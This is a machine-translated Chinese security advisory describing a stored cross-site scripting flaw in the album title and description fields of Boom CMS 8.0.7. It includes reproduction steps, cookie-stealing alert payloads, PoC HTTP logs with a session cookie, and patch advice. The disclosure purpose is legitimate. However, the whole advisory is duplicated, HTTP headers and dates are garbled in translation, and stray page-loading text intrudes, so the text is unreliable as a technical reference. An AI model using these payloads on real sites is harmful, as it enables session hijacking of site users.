#利用标题: Boom CMS V8.0.7-跨站点脚本
参考(来源): https://www.vulnebailaby-lab.com/GET_CONTENT.PHP?ID=2274
发布日期: 2023-07-03
脆弱性实验室ID(VL-ID): 2274
产品服务简介:
========================================
Boom是一个完全特色,易于使用的CMS。十多年来,许多版本之后,Boom是一个直观的Wysiwyg CMS,可使生活
易于内容编辑和网站经理。使用Boomcms很简单。学习和开始创建内容很容易快捷。
它提供了编辑人员的控制,但不需要任何技术知识。
(HomePage:https://www.boomcms.net/boom-boom的副本)
摘要咨询信息:
======================================
脆弱性实验室核心研究团队在Boom CMS V8.0.7 Web应用程序中发现了一个持久的跨站点漏洞。
受影响的产品:
============================
UXB伦敦
Product: Boom V8.0.7-内容管理系统(Web -application)
漏洞披露时间表:
============================================
2022-07-243360研究人员通知协调(安全研究人员)
2022-07-25:供应商通知(安全部门)
2023 - ** - ** :供应商响应/反馈(安全部门)
2023 - ** - ** :供应商Fix/patch(服务开发人员团队)
2023 - ** - ** :安全性确认(安全部门)
2023-07-03:公共披露(脆弱实验室)
发现状态:
=====================
出版
剥削技术:
================================
偏僻的
严重性级别:
===================
中等的
身份验证类型:
============================
限制身份验证(用户特权)
用户交互:
=====================
用户互动低
披露类型:
=====================
负责披露
技术详细信息描述:
=====================================
在官方的Boom CMS V8.0.7 Web应用程序中发现了持久的脚本代码注入Web漏洞。
该漏洞使远程攻击者可以将自己的恶意脚本代码注入持续的攻击向量以补偿
从应用程序端浏览到Web应用程序请求。
该漏洞位于Asset-Manager模块中专辑标题和专辑描述的输入字段中。
特权低的攻击者能够在标题和描述中添加带有恶意脚本代码的错误专辑。
注射后,专辑将在后端显示,是在主要资产预览时执行的。
漏洞的攻击向量是持久的,注入请求方法是帖子。验证试图解析
使用后斜线的内容。因此,对自己的恶意没有任何影响
Java-scripts仅对双重报价进行仅执行以防止SQL注射。
成功剥削漏洞会导致会议劫持,持续的网络钓鱼攻击,持久
外部重定向到恶意来源,并持续操纵受影响的应用程序模块。
请求方法:
[+]帖子
弱势模块:
[+] Assets-Manager(专辑)
脆弱功能:
[+]添加
脆弱参数:
[+]标题
[+]描述
受影响的模块:
[+]前端(专辑)
[+]后端(专辑资产)
概念证明(POC):
================================
持续的输入验证Web漏洞可以由具有低特权用户帐户且用户交互较低的远程攻击者利用。
为了进行安全示范或复制持续的跨站点网络漏洞,遵循以下提供的信息和步骤继续进行。
重现脆弱性的手动步骤.
1。登录应用程序作为限制用户
2。创建新专辑
3。注入测试脚本代码有效负载到标题和描述
4。保存请求
5。预览前端(专辑)和后端(资产- 经理专辑列表)引发执行
6。持续的跨站点网络漏洞的成功复制!
有效载荷:
ScriptTalet(document.cookie)/scriptDiv样式=1
amouseover=alert(document.cookie)测试/a
--- POC会话日志(注入)---
HOST: LOCALHOST:8000
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:90.0)gecko/20100101 Firefox/90.0
ACCEPT:应用程序/JSON,text/javaScript, /; Q=0.01
content-type:应用程序/json
X-重新要求- WITH: XMLHTTPREQUEST
内容长度: 263
原始:https://localhost:8000
Connection:保持空白
Referer3:https://localhost:8000/boomcms/Asset-Manager/posers/[Evil.source]
sec-fetch-site:相同原产
{'asset_count':1,'id':35,'name':''[注入脚本代码有效载荷1!]','description':''[注入脚本代码有效载荷2!]',',','
'slug':'a','order':null,'site_id':1,'feature_image_id':401,'created_by':9,'deleted_by'
:NULL,'DELETED_AT':NULL,'create_at':'2021-xx-xx-xx xx:x33:x','updated_at':
-
PUT: HTTP/1.1 200好
Server: Apache
cache-control:无缓存,私人
set-cookie: max-age=7200;路径=/
cookie: laravel_session=eyjpdii6imvqsktejzqjjlrpt0ilcj2ywx1si6ikxrduznwuf
vv1endrzk1twkxxxdnertufdy2pbs0jsytvfakpprnnub1kwskf6amqtyilcjty
yotuyztk3mjhlnzk1ywuzzwq5njnhnhhnhmrkzmnlmtk0nzq5zmq2zmq2zdayzdezted;
max-age=7200;路径=/; httponly
内容长度: 242
Connection:保持空白
content-type:应用程序/json
-
HOST: LOCALHOST:8000
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:90.0)gecko/20100101 Firefox/90.0
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/WebP,/; Q=0.8
Accept-Language: de,en-us; q=0.7,en; q=0.3
Accept-incoding: Gzip,Deflate,br
Connection:保持空白
cookie: laravel_session=eyjpdii6imvqsktejzqjjlrpt0ilcj2ywx1si6ikxrduznwuf
vv1endrzk1twkxxxdnertufdy2pbs0jsytvfakpprnnub1kwskf6amqtyilcjty
yotuyztk3mjhlnzk1ywuzzwq5njnhnhhnhmrkzmnlmtk0nzq5zmq2zmq2zdayzdezted;
-
GET: HTTP/1.1 200好
Server: Apache
cache-control:无缓存,私人
set-cookie:
VARY:接受编码
内容长度: 7866
Connection:保持空白
content-type:文本/html; charset=UTF-8
-
脆弱的源:资产管理器/相册/[ID]
li data-album='36'
a href='#专辑/20'
div
H3 [恶意注入脚本代码有效载荷1!]/H3
P class='description''[恶意注入脚本代码有效载荷2!]/p
p class='count'Span0/跨度资产/p
/div
/一个
/li
/iframe/p/div/a/li/ul/div/div/div/div
/div
Div ID='B-Assets-View-Asset-container'/div
Div ID='B-Assets-View-selection-container'/div
div ID='b-assets-view-album-container'divdiv id='b-assets-view-album'
div class='heading'
h1 class='较大的b-edetable'contentectiitable='true'[恶意注入脚本代码有效载荷1!]/h1
p class='描述b-ededable'contentectibal='true'[恶意注入脚本代码有效载荷2!]/p
/div
解决方案- 修复补丁:
================================
漏洞可以通过易受伤害标题和描述参数的安全解析和编码来修补漏洞。
限制输入字段并禁止使用特殊字符。消毒输出清单位置以防止进一步攻击。
安全风险:
===================
应用程序中持续输入验证Web漏洞的安全风险估计为媒介。
学分作者:
=======================
脆弱性-LAB [研究团队] -https://www.vulnerability-lab.com/show.php?user=vulnerability-lab
参考(来源): https://www.vulnebailaby-lab.com/GET_CONTENT.PHP?ID=2274
发布日期: 2023-07-03
脆弱性实验室ID(VL-ID): 2274
产品服务简介:
========================================
Boom是一个完全特色,易于使用的CMS。十多年来,许多版本之后,Boom是一个直观的Wysiwyg CMS,可使生活
易于内容编辑和网站经理。使用Boomcms很简单。学习和开始创建内容很容易快捷。
它提供了编辑人员的控制,但不需要任何技术知识。
(HomePage:https://www.boomcms.net/boom-boom的副本)
摘要咨询信息:
======================================
脆弱性实验室核心研究团队在Boom CMS V8.0.7 Web应用程序中发现了一个持久的跨站点漏洞。
受影响的产品:
============================
UXB伦敦
Product: Boom V8.0.7-内容管理系统(Web -application)
漏洞披露时间表:
============================================
2022-07-243360研究人员通知协调(安全研究人员)
2022-07-25:供应商通知(安全部门)
2023 - ** - ** :供应商响应/反馈(安全部门)
2023 - ** - ** :供应商Fix/patch(服务开发人员团队)
2023 - ** - ** :安全性确认(安全部门)
2023-07-03:公共披露(脆弱实验室)
发现状态:
=====================
出版
剥削技术:
================================
偏僻的
严重性级别:
===================
中等的
身份验证类型:
============================
限制身份验证(用户特权)
用户交互:
=====================
用户互动低
披露类型:
=====================
负责披露
技术详细信息描述:
=====================================
在官方的Boom CMS V8.0.7 Web应用程序中发现了持久的脚本代码注入Web漏洞。
该漏洞使远程攻击者可以将自己的恶意脚本代码注入持续的攻击向量以补偿
从应用程序端浏览到Web应用程序请求。
该漏洞位于Asset-Manager模块中专辑标题和专辑描述的输入字段中。
特权低的攻击者能够在标题和描述中添加带有恶意脚本代码的错误专辑。
注射后,专辑将在后端显示,是在主要资产预览时执行的。
漏洞的攻击向量是持久的,注入请求方法是帖子。验证试图解析
使用后斜线的内容。因此,对自己的恶意没有任何影响
Java-scripts仅对双重报价进行仅执行以防止SQL注射。
成功剥削漏洞会导致会议劫持,持续的网络钓鱼攻击,持久
外部重定向到恶意来源,并持续操纵受影响的应用程序模块。
请求方法:
[+]帖子
弱势模块:
[+] Assets-Manager(专辑)
脆弱功能:
[+]添加
脆弱参数:
[+]标题
[+]描述
受影响的模块:
[+]前端(专辑)
[+]后端(专辑资产)
概念证明(POC):
================================
持续的输入验证Web漏洞可以由具有低特权用户帐户且用户交互较低的远程攻击者利用。
为了进行安全示范或复制持续的跨站点网络漏洞,遵循以下提供的信息和步骤继续进行。
重现脆弱性的手动步骤.
1。登录应用程序作为限制用户
2。创建新专辑
3。注入测试脚本代码有效负载到标题和描述
4。保存请求
5。预览前端(专辑)和后端(资产- 经理专辑列表)引发执行
6。持续的跨站点网络漏洞的成功复制!
有效载荷:
ScriptTalet(document.cookie)/scriptDiv样式=1
amouseover=alert(document.cookie)测试/a
--- POC会话日志(注入)---
正在加载...
localhost
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:90.0)gecko/20100101 Firefox/90.0
ACCEPT:应用程序/JSON,text/javaScript, /; Q=0.01
content-type:应用程序/json
X-重新要求- WITH: XMLHTTPREQUEST
内容长度: 263
原始:https://localhost:8000
Connection:保持空白
Referer3:https://localhost:8000/boomcms/Asset-Manager/posers/[Evil.source]
sec-fetch-site:相同原产
{'asset_count':1,'id':35,'name':''[注入脚本代码有效载荷1!]','description':''[注入脚本代码有效载荷2!]',',','
'slug':'a','order':null,'site_id':1,'feature_image_id':401,'created_by':9,'deleted_by'
:NULL,'DELETED_AT':NULL,'create_at':'2021-xx-xx-xx xx:x33:x','updated_at':
-
PUT: HTTP/1.1 200好
Server: Apache
cache-control:无缓存,私人
set-cookie: max-age=7200;路径=/
cookie: laravel_session=eyjpdii6imvqsktejzqjjlrpt0ilcj2ywx1si6ikxrduznwuf
vv1endrzk1twkxxxdnertufdy2pbs0jsytvfakpprnnub1kwskf6amqtyilcjty
yotuyztk3mjhlnzk1ywuzzwq5njnhnhhnhmrkzmnlmtk0nzq5zmq2zmq2zdayzdezted;
max-age=7200;路径=/; httponly
内容长度: 242
Connection:保持空白
content-type:应用程序/json
-
正在加载...
localhost3
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:90.0)gecko/20100101 Firefox/90.0
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/WebP,/; Q=0.8
Accept-Language: de,en-us; q=0.7,en; q=0.3
Accept-incoding: Gzip,Deflate,br
Connection:保持空白
cookie: laravel_session=eyjpdii6imvqsktejzqjjlrpt0ilcj2ywx1si6ikxrduznwuf
vv1endrzk1twkxxxdnertufdy2pbs0jsytvfakpprnnub1kwskf6amqtyilcjty
yotuyztk3mjhlnzk1ywuzzwq5njnhnhhnhmrkzmnlmtk0nzq5zmq2zmq2zdayzdezted;
-
GET: HTTP/1.1 200好
Server: Apache
cache-control:无缓存,私人
set-cookie:
VARY:接受编码
内容长度: 7866
Connection:保持空白
content-type:文本/html; charset=UTF-8
-
脆弱的源:资产管理器/相册/[ID]
li data-album='36'
a href='#专辑/20'
div
H3 [恶意注入脚本代码有效载荷1!]/H3
P class='description''[恶意注入脚本代码有效载荷2!]/p
p class='count'Span0/跨度资产/p
/div
/一个
/li
/iframe/p/div/a/li/ul/div/div/div/div
/div
Div ID='B-Assets-View-Asset-container'/div
Div ID='B-Assets-View-selection-container'/div
div ID='b-assets-view-album-container'divdiv id='b-assets-view-album'
div class='heading'
h1 class='较大的b-edetable'contentectiitable='true'[恶意注入脚本代码有效载荷1!]/h1
p class='描述b-ededable'contentectibal='true'[恶意注入脚本代码有效载荷2!]/p
/div
解决方案- 修复补丁:
================================
漏洞可以通过易受伤害标题和描述参数的安全解析和编码来修补漏洞。
限制输入字段并禁止使用特殊字符。消毒输出清单位置以防止进一步攻击。
安全风险:
===================
应用程序中持续输入验证Web漏洞的安全风险估计为媒介。
学分作者:
=======================
脆弱性-LAB [研究团队] -https://www.vulnerability-lab.com/show.php?user=vulnerability-lab